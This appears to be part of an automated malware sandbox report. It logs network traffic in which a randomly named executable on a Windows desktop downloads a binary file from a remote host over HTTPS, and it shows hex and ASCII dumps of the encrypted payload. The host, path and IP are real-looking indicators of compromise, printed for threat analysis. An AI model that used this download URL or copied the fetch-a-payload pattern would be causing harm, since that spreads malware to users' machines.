2021-11-25 11:54:54 UTC	94	IN	Data Raw: 5d 34 b0 7b e5 91 6f 0b 13 20 17 da 67 57 a0 87 bf 95 4b 66 08 4b b8 f4 c4 76 99 4f 85 62 02 7e 7d c1 73 21 d0 bf 49 0d d8 7a 64 07 5f 4f ce 97 0a dc 94 26 24 cc a7 4c 6b 2f f2 7e d5 0d 1a 2d 1f 6b 5e d1 6c 73 4e 35 71 98 45 e0 30 a7 b3 8d e3 5d 52 d7 4c df 66 ca 50 e6 9e f9 db cb 67 4b 61 1b 57 48 5b 67 11 3f fc 47 11 41 a9 1b 47 a7 b8 c5 bd 5d 66 f8 13 45 90 28 7e 19 90 4b 33 56 49 07 39 04 76 b3 75 01 cd 93 5b ed 1d e3 5a db 2b d2 ec 35 77 76 79 03 df f5 d3 92 6d 4f 01 fe 86 4d 0b 07 3e 66 8d d9 0e c0 9b 7e cd be c2 80 5c 5e d5 b2 e2 15 84 2d 45 89 c4 ba e9 61 08 90 3f fe fe 22 7e ec 44 62 1b 5a 49 79 0a e9 f7 34 42 40 f0 a0 0a 7b 2a fd 43 2e b3 1f cf 90 f7 b9 c5 01 85 38 a2 62 bc 74 89 5f c5 3a 50 99 72 7b 4a 7a e7 4f 3e 3f 4f 01 07 17 8f 87 bb 3b 67 Data Ascii: ]4{o gWKfKvOb~}s!Izd_O&$Lk/~-k^lsN5qE0]RLfPgKaWH[g?GAG]fE(~K3VI9vu[Z+5wvymOM>f~\^-Ea?"~DbZIy4B@{*C.8bt_:Pr{JzO>?O;g
2021-11-25 11:54:54 UTC	101	IN	Data Raw: 18 ba d6 5f 31 8a 16 79 cd 91 4e f2 19 c0 f5 c6 18 df fe 49 41 a4 f9 01 01 c3 25 55 8b 7b b0 39 2d 43 7e f3 c0 eb 7a 5c d6 bc fe 7c 4e d0 ba 11 1e a4 17 b2 32 49 ce c7 7a 4e 8d b9 60 b8 33 b8 6d 1a 1d 83 d0 d2 a9 67 fc d6 70 ec 9d f4 a6 bd 6e 42 bd d6 80 76 ef df da 0d c8 05 47 ad b3 dd 5f 07 09 ba 73 79 96 b3 61 05 11 76 d1 62 e7 5f 5d 42 68 6b 6c b0 7c 3b c2 95 30 81 73 b3 09 38 ae 72 9e b7 c4 97 c2 e7 ca 91 83 30 b2 cf da aa 1b fa 3a 81 b4 90 12 de 6a 7a 66 5f cd b1 6d 9d 5a a9 e4 12 33 71 2f d1 0b 58 c2 41 59 a7 9f ae 57 ba da c6 cc be ec e5 b7 ad 90 16 3f 23 18 f1 78 a1 e6 64 42 92 13 28 a0 11 10 8f b0 25 fd b6 ab df 1c b7 53 bf bf 30 99 84 a1 6d 4f f4 d6 6f 06 a3 69 83 2a ac 32 1f 4d b2 91 8a a4 51 6c 98 d7 6d 3d 14 3f df 56 31 39 ed d0 3c ce ab fb Data Ascii: _1yNIA%U{9-C~z\\|N2IzN`3mgpnBvG_syavb_]Bhkl\|;0s8r0:jzf_mZ3q/XAYW?#xdB(%S0mOoi*2MQlm=?V19<
2021-11-25 11:54:54 UTC	109	IN	Data Raw: 6f 5d 45 95 9d 3b a9 46 1e a9 07 f0 80 ff 1a c7 4e 4d 60 f6 d3 24 ac 27 97 eb 78 e5 e4 a6 88 9b a3 fe 0a 74 0e 32 12 df 1c 3c 25 9c 0d 2f 91 02 62 3f c4 89 de 67 b4 4f 61 d8 7a 83 b1 61 55 39 e2 4b e9 6d 26 98 ce 55 e1 11 d3 32 0a 3d 68 6d c2 66 1b 83 d9 97 18 4e 47 56 c3 60 20 88 38 c2 f3 2e dc 30 4a 41 70 12 57 8b 03 ae 63 67 16 90 d4 ff a2 0a 98 d8 40 7d 17 e4 00 b6 c0 64 24 7c a8 16 dd 07 f1 21 cb 98 d6 27 39 3d a7 ec d0 07 2c eb ec 90 aa 8a 15 2e 68 5a 7f f1 9d 84 a6 31 df ee 0b 8b 7e be e3 e4 18 74 97 3f a2 a3 1d c8 16 63 da a7 49 8b 0a 4a 33 fa ff eb 53 3a 00 88 5f 82 e3 3f 29 fa c7 ef 47 6c 78 5b e4 49 ea 16 1c 84 e2 89 05 a2 3e 18 1a ef 81 a1 0f 5d 66 05 cd 9e e9 a7 39 c4 3a 1c be 6a b9 84 90 82 b3 2e 12 4f 3a 26 41 41 75 54 5d 38 69 c3 3e 92 18 Data Ascii: o]E;FNM`$'xt2<%/b?gOazaU9Km&U2=hmfNGV` 8.0JApWcg@}d$\|!'9=,.hZ1~t?cIJ3S:_?)Glx[I>]f9:j.O:&AAuT]8i>
2021-11-25 11:54:54 UTC	117	IN	Data Raw: d7 10 b6 98 45 cc 3c 2d e9 70 9f 88 67 fe 72 93 45 00 1d c6 9b 03 23 12 a3 77 0d e2 5b ea 8b 15 f5 ba d5 3d 5c f6 4b d5 b4 61 9a 8b a9 6f 43 88 8a 8c 8b 8c 4b 9c 87 62 97 fc 66 9a e9 3a 8b 21 e2 b2 c7 2e 5d 99 66 5c 78 22 51 43 75 54 53 c8 c8 23 b0 18 90 8e c2 88 20 f9 e7 07 96 e0 6a df 0a d1 5c ee 31 e7 97 dd 65 b8 ea 5e 61 df 9c 7b 80 05 9b 3e b2 ca 61 57 2f 53 80 be 77 ea 10 dd b4 a0 a3 80 50 1a 24 9d 43 72 21 01 d4 a0 34 b0 c1 91 5d 15 60 7e 61 38 93 3d 97 2b db fc 55 54 d7 87 a4 0e b3 e3 73 cf 7b 28 b7 bd 77 aa b1 13 51 ac eb fd e0 fc 49 6f 15 ea 97 ba 9c b5 d5 66 5f 48 f4 93 02 76 00 bb 3f 08 2e 5c 21 56 17 23 56 e8 85 35 1c 3e 28 88 72 c7 3d d0 6d b3 23 00 73 36 17 c0 c9 fa c1 1f 5d 25 47 a2 a7 7e 30 58 b7 d5 2f 03 de 2c 4b 05 5d 85 a9 b9 63 36 fb Data Ascii: E<-pgrE#w[=\KaoCKbf:!.]f\x"QCuTS# j\1e^a{>aW/SwP$Cr!4]`~a8=+UTs{(wQIof_Hv?.\!V#V5>(r=m#s6]%G~0X/,K]c6
2021-11-25 11:54:54 UTC	125	IN	Data Raw: 77 d8 7b 6b 2a 25 48 05 38 5e 9d dc f4 d5 3c 5d e0 6e e4 c8 68 e7 36 a5 16 5a 57 9b 93 9c 0c 60 78 8c 64 f7 4c 19 9e c8 33 5e 88 6e cf 74 36 3e 04 4f 09 ea ed c5 a0 59 b6 9e df dd 6e 38 70 0d 5c e9 b5 4b 39 d8 0d a4 54 49 21 d1 5c 77 d0 6c a6 50 75 c9 e3 e0 58 c7 6a 53 79 02 74 05 5a ae 8a d6 83 0c 58 7a 6f c3 4a 54 b1 aa 7c 6a 0f 22 66 7e da 93 a1 94 3f 56 58 62 52 0b 69 bb 7a 3d fe bf a3 32 07 83 f0 9d b1 c9 a2 64 07 f7 ea 9b 79 6d d3 30 72 a2 49 17 2d e3 35 af 55 f3 b4 aa e4 70 ed 05 8c f2 a5 de b7 08 77 56 fa 52 c8 9d d8 10 54 46 9e ec 20 66 3a a1 4b 55 3f 11 a6 fd ca f1 2c cc a6 18 1b b6 02 21 ec f3 55 2b 67 16 d5 86 01 3b 2b 8a 92 86 c5 87 df 33 ce 8f 80 ef cf dd 67 9a 1c b9 12 3e cb a2 d2 53 e6 59 a9 4a 31 bf 19 18 a0 d3 d9 df 5e d1 42 b2 1e f3 e0 Data Ascii: w{k*%H8^<]nh6ZW`xdL3^nt6>OYn8p\K9TI!\wlPuXjSytZXzoJT\|j"f~?VXbRiz=2dym0rI-5UpwVRTF f:KU?,!U+g;+3g>SYJ1^B
2021-11-25 11:54:54 UTC	133	IN	Data Raw: cb 25 e9 09 0a 08 6c 8d 8b 5b 75 bd f1 b1 f1 0d 75 87 30 c0 6a 79 ca 9a 11 96 39 85 12 83 5b ec cb c2 11 25 bf 7d 84 49 61 87 75 48 20 d3 77 54 80 6d 37 d6 21 5f f7 3a 47 51 af d0 51 81 fa 8a 4c 26 63 57 94 fd 3d f7 d7 e7 68 b1 73 f4 97 f4 f0 c4 79 dc 51 18 5c 96 56 23 ea 00 35 e3 40 c1 24 d2 f5 1f 01 93 c3 f7 73 79 10 02 14 f7 8c dc 89 2c 3a a8 84 ad 05 81 69 03 54 95 e9 ca 86 f7 b0 f1 15 f7 7d 81 31 5b 95 bd 4d a1 3e ad a4 0a e6 54 40 fb f9 20 09 aa a8 80 88 2a fa e5 0f 89 3a 3b 4a b9 ec cd bc e4 2e 6f 43 f4 1e ae 6d 18 75 46 3c a5 4f db 34 9c 46 8e ce 9b b1 93 43 fc eb f1 43 76 76 eb 4c a0 b4 c5 7d 49 44 3b f3 22 61 46 c5 ac ed ca af ad b4 eb d0 ab 13 80 af 21 78 a0 df c5 1c 87 fc 15 80 eb 65 84 73 26 72 96 b3 fe 20 21 79 fd 60 2f 60 a9 6c ec f9 cf 4a Data Ascii: %l[uu0jy9[%}IauH wTm7!_:GQQL&cW=hsyQ\V#5@$sy,:iT}1[M>T@ *:;J.oCmuF<O4FCCvvL}ID;"aF!xes&r !y`/`lJ
2021-11-25 11:54:54 UTC	140	IN	Data Raw: 14 27 0b 9e 3f 22 e9 e1 4b d7 fd cc 2a a7 20 d8 27 4a 9c 34 f2 fa 06 6b 51 fe e8 1e ef d9 65 5a 30 88 ae 98 ec 32 c0 2b 3b f3 6b 7d 5e 83 15 29 c8 e7 62 72 4f 8c 26 85 aa fa cf 66 09 05 02 d1 12 ae 29 d8 86 31 29 1e 97 c9 89 c3 d7 06 9f 65 8f 3e c1 85 6c 36 fd 3c 3a 7e 39 a8 d8 ce 56 6a 11 ec 96 bb 06 9e 1f bc d1 08 55 d1 21 b0 f2 d2 e2 af 1c ad d9 fa 80 cc be 13 3c 63 f4 d9 29 6d 36 61 01 2a 29 84 0d 19 8f 4a 65 9a 08 8d 93 60 57 20 9a 19 ec 50 27 97 5c da 73 d2 4a 49 73 64 fa ee 91 c5 c2 e5 69 16 f4 3e 59 92 80 2c 94 20 8f 45 08 cb 2d 15 35 8f f3 4b 37 e6 65 cb bc 8e 2c d3 63 82 f4 81 74 54 03 3b 09 9d 85 4e da 1e a3 23 5a 54 72 7d 03 30 a8 bb 60 2e 83 4e dc 16 7d ef fe 6e 6d 33 b1 f0 a1 64 a6 48 3b 4f 21 2b 9e 7f 39 4d c1 5a 3e 27 bd eb e3 29 c9 27 eb Data Ascii: '?"K* 'J4kQeZ02+;k}^)brO&f)1)e>l6<:~9VjU!<c)m6a*)Je`W P'\sJIsdi>Y, E-5K7e,ctT;N#ZTr}0`.N}nm3dH;O!+9MZ>')'
2021-11-25 11:54:54 UTC	148	IN	Data Raw: 7d ee 93 7c c8 a7 54 e9 e1 5f 44 d4 7b 12 05 02 53 9a 24 be 8f ee 28 6e 94 04 0b e3 80 fc 64 b6 94 90 4d c1 cb 50 70 5b 0c e3 da 4d 13 12 79 c9 d5 39 2c ba 06 19 fa 4f 70 ca 7f cc dd 3d 43 10 1c 4a 6b 80 dd b6 b9 3c e5 4f 38 8b 8b af 80 fd 32 8e 5c 66 e9 be 8e 5c da 58 ce 0c e9 a1 5d fe de 19 6d 15 ec 43 35 f6 8f b6 5d 29 e9 ab ed 8e 13 13 01 6c c1 b6 66 7e 9e d8 ea 93 9e 56 cb 42 90 99 98 79 ca cb d1 d6 aa 89 d0 d6 81 1c 74 cd 82 e0 6b 93 48 f2 0f 9c c2 fb ee f8 ca 1b 76 60 c2 ae ab 9b 5d 07 1d cd 6d 03 39 4b 02 c2 06 5e fa e6 d2 57 5d 95 38 2c aa 8d 0f 9b a8 dd 19 c5 52 b3 1f ad b5 02 25 ab 37 36 60 25 b8 cc cd 2c 39 71 e8 86 57 cc 8d 44 ea 3e 87 9f 5b 0a 60 8b 99 66 aa b4 52 b4 91 ca 69 c7 29 63 93 e4 9e 0c c0 ee 48 c3 41 2a 4b d5 ff 09 33 8b 8f 7e 30 Data Ascii: }\|T_D{S$(ndMPp[My9,Op=CJk<O82\f\X]mC5])lf~VBytkHv`]m9K^W]8,R%76`%,9qWD>[`fRi)cHA*K3~0
2021-11-25 11:54:54 UTC	156	IN	Data Raw: 07 13 23 bb 38 c9 12 7e 8f ba c8 7b 28 f2 25 a6 e8 69 ac ac 9a dd 8f 1d a9 13 57 58 58 e8 63 34 d0 83 66 01 0d 00 6c 4b 59 dd 90 91 dd 19 42 76 7f e8 78 a2 04 fb 83 63 bd 05 c7 d2 0e e1 d9 00 60 8a 34 73 c8 78 3e 5b e7 3e a3 9d ed 5b 1a 06 f0 9f 51 fa 44 a4 95 ae 99 79 f2 2b 5c 9f c0 c4 5b 64 a1 76 e2 26 98 54 b0 67 60 f8 9b a2 b3 6a 1d d4 ac 87 32 f3 54 da 1b 70 52 c3 09 51 1c 05 4a 39 37 8c 1e d5 98 4a dd 10 04 06 0e ab c0 ec de 54 c1 e5 4b e3 9f a9 b5 33 0b 6d 03 3b ea 64 49 a1 8a c4 0d 1b d3 59 41 4a 0d 86 49 38 72 c8 ca cd 5f cf 0c 86 70 a9 fc f7 09 35 b1 a9 71 42 c4 37 f4 b8 4f 18 f7 22 b0 e9 62 6e b5 c8 df 7e 73 f2 93 ab 94 f2 9e 37 6b 95 f3 05 3d 96 36 a0 97 a6 db a5 95 e4 a7 7e 3a e0 e6 ed 80 3b 17 16 ed fc ab d1 bc 64 ff 41 fb eb 91 c1 8e 6f f4 Data Ascii: #8~{(%iWXXc4flKYBvxc`4sx>[>[QDy+\[dv&Tg`j2TpRQJ97JTK3m;dIYAJI8r_p5qB7O"bn~s7k=6~:;dAo

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49837	107.6.148.162	443	C:\Users\user\Desktop\Zr26f1rL6r.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-25 12:01:12 UTC	163	OUT	GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: atseasonals.com Cache-Control: no-cache
2021-11-25 12:01:12 UTC	164	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 12:01:12 GMT Server: Apache Last-Modified: Wed, 24 Nov 2021 12:20:38 GMT Accept-Ranges: bytes Content-Length: 167488 Connection: close Content-Type: application/octet-stream
2021-11-25 12:01:12 UTC	164	IN	Data Raw: 70 99 d0 d2 81 fc a4 8c 6e ba 05 d0 4f 67 65 7f 4e 1e 4a f3 03 49 ab 4d f8 3b 67 96 a3 b5 f7 07 46 d9 a0 8b 7f 32 0c 43 a2 5a 42 b2 12 de b0 f4 94 d3 dc 46 6c cf 8e 15 59 63 2a 6b 99 39 71 c3 a8 94 6c 4a 84 13 81 5d 6a 1e 54 51 46 ba f1 ed d4 08 c0 6b 8d b8 64 71 ec 91 c7 1a 01 6d 7f 49 a6 3a 51 3c d1 ca 0c 98 4f 06 47 24 6b ec 56 9c d7 39 29 7f 90 8f 10 2b ff c6 eb 49 87 e7 e0 70 77 e6 54 c0 aa f3 4b 59 89 c0 66 fa 8f 90 47 e4 0a 64 47 b5 d4 b5 71 92 58 65 b7 82 12 15 37 dd 6f c2 ec 2e 2b df 1d cf 2c 5e 7a d8 f2 d7 16 ec 09 81 e5 9d 39 0d e2 1d d4 71 ba ff de 2e 9b 03 5e 74 c4 af 5c 6d 82 2a 3a fb 21 10 13 c5 ce 56 69 4f 4e 29 b7 4f 90 af e9 9a cd 2d 39 69 e5 2b 66 10 5b b4 5e 9d e0 b1 b1 c0 09 52 76 c0 87 33 99 a3 bb ca 51 43 75 54 5b 4e a0 ab 74 91 19 Data Ascii: pnOgeNJIM;gF2CZBFlYck9qlJ]jTQFkdqmI:Q<OG$kV9)+IpwTKYfGdGqXe7o.+,^z9q.^t\m:!ViON)O-9i+f[^Rv3QCuT[Nt
2021-11-25 12:01:12 UTC	172	IN	Data Raw: 8e bc 4e ec 48 d6 a2 16 02 23 e6 e8 1f c6 a2 f1 87 bf bc dc f2 e5 1d 71 93 43 e5 f8 66 89 73 ea 07 49 9d 46 cf 62 29 04 b0 e9 ff 10 16 06 87 4d 38 5b 62 65 fc dc 00 f5 ba 79 ad 56 32 fd 03 8f fb 4b a3 5d d9 ce 81 4a 9e 3d 17 f4 d2 a1 c7 87 3d fd 91 4b 9a 13 dd 39 3b e3 c6 4f 06 1c 79 d3 83 26 00 53 1b 67 5c 44 5b d7 c5 62 93 8e 6f 5e 54 c7 c8 d9 a6 d5 ad 5a 6e da 10 69 c7 77 c2 68 d5 b1 0a 47 90 e0 8d 6a c4 32 66 27 47 62 84 7f 3d 22 1c 03 85 6c ab 59 45 eb 4f 70 ed 38 f2 31 d8 5d 7f f7 6a d4 8d e0 3d 2c 94 bd bd 34 7c 13 68 7f d2 e5 fe c7 04 85 50 1c bd f6 f8 38 d0 29 78 5b 26 a9 d3 c5 eb 01 5f 8a aa 88 23 3f 9d 0e a8 06 f9 96 8b 3e 21 23 9c 5b 82 da cd 2b 99 a0 fe 37 cb c6 17 31 d1 3e 34 39 7e 3f 48 2b bc 10 99 e2 7e 1d 53 6c e7 67 00 b8 4c cb 8f 35 3c Data Ascii: NH#qCfsIFb)M8[beyV2K]J==K9;Oy&Sg\D[bo^TZniwhGj2f'Gb="lYEOp81]j=,4\|hP8)x[&_#?>!#[+71>49~?H+~SlgL5<
2021-11-25 12:01:12 UTC	179	IN	Data Raw: 17 ca c7 b5 b0 fd 86 d4 50 e2 18 b0 be fc 2c 30 5c 16 11 88 54 5e c2 28 df 35 9a e5 69 10 10 31 89 2f e6 ff 54 6f a8 c6 95 52 74 48 c3 55 81 2d a3 39 d4 90 8c de 8f ac 70 eb d0 5c 9a b4 cb c6 df e5 6e 92 bb e0 07 43 df 69 24 b6 a3 ff 52 4d 29 ca 8f 99 4e 68 fd 8d 02 21 f9 01 4f d0 f8 f4 b2 d7 01 9e 4f 32 70 2f 03 53 61 cf 97 3d 62 d8 cb 03 51 97 a7 1f fa e3 e0 00 ae 92 0e 09 13 96 7e 52 65 3e 2c 36 85 a9 5f 75 e6 c6 6b 89 c3 66 55 25 98 6d c9 f0 bf 96 47 05 9a 61 2d 1b 23 3c d2 96 92 82 cd d6 ba 3e e6 4b 58 a5 48 1a 87 7a 4e a4 a1 b0 2f c4 55 d6 16 76 a6 7e 33 3e 12 d9 fe 29 5c 1b e6 13 d5 ac a1 ad c2 77 9a 02 73 8b ad 40 f6 2c 55 64 27 90 b5 a5 e4 a9 df 87 eb b3 1f 0e 25 a1 6a 1c 00 e9 16 a1 dc 22 2a cc fc 49 cb 9d 4b 61 fc 33 db 5f 43 37 03 c7 17 86 ac Data Ascii: P,0\T^(5i1/ToRtHU-9p\nCi$RM)Nh!OO2p/Sa=bQ~Re>,6_ukfU%mGa-#<>KXHzN/Uv~3>)\ws@,Ud'%j"*IKa3_C7
2021-11-25 12:01:12 UTC	187	IN	Data Raw: 5e 04 43 a7 80 c5 2e bc ac 30 1b fd 04 75 d2 7b c3 ff 8f b3 94 45 75 96 b0 c1 0e c5 b4 fe 2c b1 ea f1 19 bc 38 04 74 40 f6 58 cf 71 0f 1d 37 59 d4 56 20 d6 3b 0b 08 06 2b 25 af 1c e8 5d 25 2b a9 a9 84 c0 fc 5c 15 9e 07 91 73 db 7e b9 86 27 ec 6f ef 41 31 47 63 86 4f b4 d0 c0 7e 85 7f 34 15 92 9b a9 64 70 cc de 9f a5 6e db 3f e8 ec 35 9e a0 26 0f 59 b8 24 95 fd 58 9f 6f 6a e5 01 85 0a 0b 08 6a e0 61 43 7d 0a 70 5d d7 d5 19 95 5a d5 8c f0 37 72 50 a0 cc f8 47 f9 ef af e9 4c 94 65 65 81 fa 5c 37 a8 cb a6 7c dd a5 58 79 e1 91 0a 47 af 03 bc cf 03 e8 4d d6 93 39 65 e6 7b 6a fb 85 bc aa 46 76 d9 b3 d3 9e 04 54 9e 7f e3 4f 52 87 33 b9 08 2f a0 02 a8 b2 21 6e 07 d1 3a 84 8d 7a 08 c8 80 91 23 98 0b cb b7 03 07 3e 34 a9 c8 c4 db f6 7c 5d 81 f9 6a 58 32 78 f5 85 ae Data Ascii: ^C.0u{Eu,8t@Xq7YV ;+%]%+\s~'oA1GcO~4dpn?5&Y$XojjaC}p]Z7rPGLee\7\|XyGM9e{jFvTOR3/!n:z#>4\|]jX2x
2021-11-25 12:01:12 UTC	195	IN	Data Raw: 10 24 e9 36 49 4b 33 3f ba 8b 32 30 9e 48 46 3e 28 e7 ce c7 f9 03 d0 c0 2b f2 4b 41 2c 3a 96 8e 46 0d 63 2d d7 0b 4e d7 ba ef b6 ec 68 3b e0 4e de 91 bd dc 1b d2 04 7c c0 14 44 a9 bf 32 ea 46 fa 70 92 bb e4 c5 95 17 c9 a0 2b 0a 81 c4 0d 82 88 14 16 3b 92 db 30 c5 f8 f6 f5 b3 c6 8c ba b6 c4 91 6a 02 82 a5 9b 20 f9 72 f0 00 6f 46 3d 6c 9b f0 19 de 6a 19 23 92 bb 0b fb 12 49 d8 d1 4e 31 fa ca 64 ef 07 91 de 08 9e f0 1b c4 57 59 a7 89 e0 ea d6 40 3c d5 1e d7 ea 6e c0 f1 67 de c3 ef c4 80 61 ac 13 a5 fa 22 90 53 e0 43 11 ec c3 e9 c4 f0 78 10 cd eb 15 6c 89 de e4 fe da 0c 85 a1 7c e1 ec 18 42 b4 26 ea ea 93 ec 02 99 62 cb 42 0d b1 ce c6 06 10 35 4b 6b dc 91 88 92 c5 92 42 60 e4 07 80 b6 f6 b7 dc 88 2f 35 f3 c9 a7 ca 6e 25 6b 6f 92 8c 5a ac 9d 81 6f 70 42 41 83 Data Ascii: $6IK3?20HF>(+KA,:Fc-Nh;N\|D2Fp+;0j roF=lj#IN1dWY@<nga"SCxl\|B&bB5KkB`/5n%koZopBA
2021-11-25 12:01:12 UTC	203	IN	Data Raw: 8c e2 92 21 9f f8 12 80 71 84 bb 0d 80 91 03 cc 26 88 73 33 ec 1a dd b9 91 14 4c 37 25 ba 25 7e ef 29 a1 28 6c c5 3d bb 07 44 cd e3 18 34 78 b9 e8 f0 f3 88 4f d4 cb 68 a4 fc 81 7b 7d 01 17 38 a3 f9 03 2f 47 85 af 26 e8 15 78 e9 d3 8a 28 94 95 0c e9 77 8b c1 d0 0f 3b 94 07 9b 6d 7a 2e ca fa ce 04 90 40 1e 60 b7 42 32 d7 88 60 d7 01 4c a0 5e cd 95 16 83 c1 e5 19 71 d4 ff ef b3 dc a3 40 aa 69 a1 87 79 10 75 a2 d9 c6 08 60 bc 69 b4 13 01 ef 9c b6 75 ea 17 ed 29 9a 03 a0 d6 eb b7 a5 0c 5a 64 5c a2 2b d3 cf 9f 5c 5e ac 0a d6 34 49 a4 4a a2 c7 83 ee 75 86 ae c1 67 cf 6f ca 3f 0e 9e b0 f9 e3 f9 e7 7f b7 97 3e 5b 8a a2 bb 41 14 53 f6 90 07 8e 60 df 0a f8 18 77 4c 6a 8f 8b 69 1f c7 08 6d cc 53 12 bf 2b b1 e2 4a c4 a6 d7 50 59 f2 5d 9c 2a 68 71 21 fd da 71 20 5c 63 Data Ascii: !q&s3L7%%~)(l=D4xOh{}8/G&x(w;mz.@`B2`L^q@iyu`iu)Zd\+\^4IJugo?>[AS`wLjimS+JPY]*hq!q \c
2021-11-25 12:01:12 UTC	211	IN	Data Raw: 77 74 a8 2a 4b e2 06 58 96 8d ca 8d 97 65 ff 91 4b 09 4b d8 7f 8a 8e 9a b1 7a 27 ad e7 be 0a c7 2a 84 66 f3 ed 22 14 a0 8a ab 86 86 a0 57 c7 6f 49 8f 15 82 df 06 4e ee 1b 5c 2f df ae ed cb 0c b3 38 49 dc d3 b9 ea 5e c8 37 11 ee 80 f9 3c 02 88 cf ac d7 f7 ec fc a8 71 ea 2c b6 70 94 26 40 07 5d ce 15 cb fa 24 65 43 be 34 b0 53 91 40 fd 60 7e 3a 3b 2a 60 f3 8c 2f 3f bd d9 42 87 58 a9 8f 58 3c c4 93 32 74 55 f4 6e a1 4c b1 6e 83 75 68 2a 4a 63 ea cb 02 48 d2 d8 d5 9a a0 b7 fc 06 03 1a 56 ba 3f 46 4b 5c dd a9 e8 2a 7d df fb 81 e2 7b b7 60 72 c7 5b 59 a1 35 ca e0 7f 37 65 86 21 06 3e e0 0d 95 41 ac 28 fe 43 2b 31 3d d3 fc 21 7d 45 2e f3 d0 cb b9 1f 31 33 22 df 1d 92 a1 fe 51 3d dd d7 2a 99 ee d0 7d 36 26 61 80 a9 c0 f3 18 39 8e 12 f9 c0 d1 a8 15 3d 5f 2f c9 82 Data Ascii: wtKXeKKz'f"WoIN\/8I^7<q,p&@]$eC4S@`~:;`/?BXX<2tUnLnuhJcHV?FK\}{`r[Y57e!>A(C+1=!}E.13"Q=}6&a9=_/
2021-11-25 12:01:12 UTC	218	IN	Data Raw: 93 f7 95 01 1c e9 c9 90 db 44 18 c7 57 d0 65 23 22 c6 e3 c8 e8 80 e5 ee 48 59 19 f8 44 3f 5a 75 8b ab f1 fd 5b 06 57 6a 17 2d b3 e0 72 42 bc f5 13 a7 75 1a 9a c1 ad fe 4f cd 14 9e 03 2b 88 7c 5c 2d de ce 87 bc 11 6a 59 ba 4d fb c2 82 cd 64 f5 a3 d0 35 13 1f 03 48 7d 4f 0b ae 21 9c 2e 3f af ea b2 ed b3 c9 a7 85 bf 28 3a d8 92 a5 97 f7 58 6e 54 5d 55 59 b9 c8 70 61 b3 c5 12 1d 94 99 4b 0e 46 70 95 fa 71 be 7a 19 bc 37 de 26 a5 ab 9b 17 51 14 dd 66 56 fe 0b e3 d4 a9 5b fb d2 71 2a 86 9d 04 9d 71 a0 dc f7 dd 00 fe b7 47 c8 ef 63 22 56 3c c7 bd c8 38 c9 13 86 fc 3d f0 20 87 af 9f 46 1e bd bf 5e a8 85 3e 73 78 06 b5 45 c5 62 eb 73 8f eb ec e4 1d 01 2e 4d 1c 89 c4 3d 54 c8 fe f1 95 7c 0b c4 4a 71 37 e0 19 d0 dd ba 8d e7 1d bd fb 49 18 0f 47 81 bc 97 af b3 93 75 Data Ascii: DWe#"HYD?Zu[Wj-rBuO+\|\-jYMd5H}O!.?(:XnT]UYpaKFpqz7&QfV[q*qGc"V<8= F^>sxEbs.M=T\|Jq7IGu
2021-11-25 12:01:12 UTC	226	IN	Data Raw: c0 96 49 cd 9d e3 59 af 89 f3 bf ba ca 96 50 ca eb d6 6b 0f df e2 39 a1 bb e1 71 2e dc 70 7c b3 fe b1 3d 5a dc 17 19 2b c5 8d eb ec 96 69 78 a3 1f 61 30 c4 3d f9 58 2a 3d 95 1a 3b 1d 02 8e c8 9c 35 3b 7e 33 01 91 2c 2a 2a e7 1e 0f cd 58 3e c2 7d c3 1e be 57 d0 1f 43 a8 e9 b1 e1 65 65 8f aa 09 4a 95 40 0a 95 59 2c 47 21 76 34 1d 92 67 77 b4 2e 95 22 53 5b 16 a9 33 38 85 97 9e ad c7 bd cf 33 ae fe 8a e3 4d 65 3b a0 e3 f1 b3 28 45 95 ae 00 8d 57 13 4d a2 aa e7 81 51 61 d0 3a 4f 10 b9 23 68 07 29 52 ac 1b 34 1a 61 05 ca c5 07 d4 3b 5c 3e 99 97 0f cd 2b b8 2b 47 dc 01 59 73 a3 f9 e5 7c 3f 1b 4f 39 e3 d8 ea e1 2b 3d 52 83 f5 59 f7 1d 9b 93 18 ea 77 43 8c 82 0e dd 90 bb 77 55 02 41 de 8a 0f f8 0c 72 5a 48 d7 a8 76 d4 12 f4 7a 30 0e 5a 2a c4 bb ed d6 7e f9 92 16 Data Ascii: IYPk9q.p\|=Z+ixa0=X=;5;~3,X>}WCeeJ@Y,G!v4gw."S[383Me;(EWMQa:O#h)R4a;\>++GYs\|?O9+=RYwCwUArZHvz0Z~
2021-11-25 12:01:12 UTC	234	IN	Data Raw: d9 61 6f 9a c0 da 28 6c 0e 3e cf 1c 0f cd c0 4e 75 e2 54 1f 7d 92 f6 a6 e5 a7 f5 96 5f 8a 39 27 ba 8a b0 99 c5 e0 6f f7 4e fa 16 01 e5 46 de 9b 99 66 19 1e 4a 44 f4 f9 58 fd a9 f2 38 3b 90 ca df 9e bb d7 ce 69 bc 3d fb dc 3c 66 a3 83 fc 36 c4 d7 df 90 46 f9 ed 98 c1 19 e5 92 ef 07 e3 d5 a0 c6 9e 0c 9f a1 f3 01 b6 26 8a dc 6e 40 af d8 f1 6a f2 6f 49 47 4d 9a 61 a8 50 68 a6 5e 83 b1 ea 10 ba 8f 83 79 f0 48 37 81 5d 3a 2c d7 d3 4f 62 6f 86 cc 10 4b 6b e4 46 6a 3c 85 6d 30 1a 8a fd 2e c0 e1 22 97 b9 91 35 f3 67 4f ee e9 a3 6b ec db 09 97 c6 d6 80 fa 8d 42 c3 7f 55 eb 49 b2 62 a0 8f 86 06 be 98 42 d4 c3 6b 57 f3 bf 35 86 89 96 57 6c 93 e6 c5 a6 da 7e 9a b0 78 d2 8b 73 11 59 e1 4d 0a 08 6f 0b ad 00 15 c0 e5 05 92 b6 f2 45 9f 32 67 c6 e4 ff 73 cb 17 f0 19 02 7d Data Ascii: ao(l>NuT}_9'oNFfJDX8;i=<f6F&n@joIGMaPh^yH7]:,OboKkFj<m0."5gOkBUIbBkW5Wl~xsYMoE2gs}
